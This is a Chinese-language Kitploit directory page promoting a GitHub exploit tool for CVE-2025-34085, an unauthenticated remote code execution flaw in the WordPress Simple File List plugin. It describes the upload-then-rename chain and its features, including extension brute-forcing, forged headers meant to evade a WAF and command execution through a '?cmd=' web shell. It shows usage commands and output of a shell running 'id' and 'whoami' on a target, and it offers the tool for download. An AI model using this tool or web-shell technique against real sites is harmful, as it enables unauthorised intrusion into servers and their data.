Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-34085 — 简单文件列表 – 未认证远程代码执行漏洞利用(CVE-2025-34085) | Kitploit
工具/GitHubGitHub/mrjhaxcore/cve-2025-34085
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubmrjhaxcore/cve-2025-34085

CVE-2025-34085

简单文件列表 – 未认证远程代码执行漏洞利用(CVE-2025-34085)

查看仓库
121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

📂 Simple File List – 未认证的远程代码执行漏洞利用 (CVE-2025-34085)

⚠️ 漏洞利用代码作者:Mrj Haxcore

一个针对 WordPress Simple File List 插件 (<= 4.2.3) 的完整 Python 漏洞利用脚本,该插件因不安全的文件上传和重命名逻辑而存在未认证的远程代码执行 (RCE) 漏洞。


💣 漏洞摘要

  • 插件:Simple File List (simple-file-list)
  • 版本:<= 4.2.3
  • CVE:CVE-2025-34085
  • 影响:未认证用户可上传伪装成 .png 的 PHP 文件,随后将其重命名为 .php 并执行任意代码。
  • 条件:无需认证
  • 漏洞利用类型:文件上传 → 重命名绕过 → 命令执行

✅ 功能特点

  • 🚀 全自动化漏洞利用链
  • 📤 手动构建 multipart/form-data(绕过 415 错误)
  • 🔁 对 .php、.php5、.phtml 等后缀进行重命名暴力破解
  • 🛡️ 真实伪造的请求头以绕过 WAF
  • 🐚 通过 ?cmd= 执行命令
  • 🧼 干净的输出(无 �PNG 垃圾数据)

🛠 使用方法

root@kitploit:~
python3 simple.py https://target.site

[+] Uploading shell as 8dkls0qp.png...
[+] Upload successful.
[+] Trying to rename to: 8dkls0qp.php...
[+] Rename successful: 8dkls0qp.php
[+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

手动访问

https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami
下载工具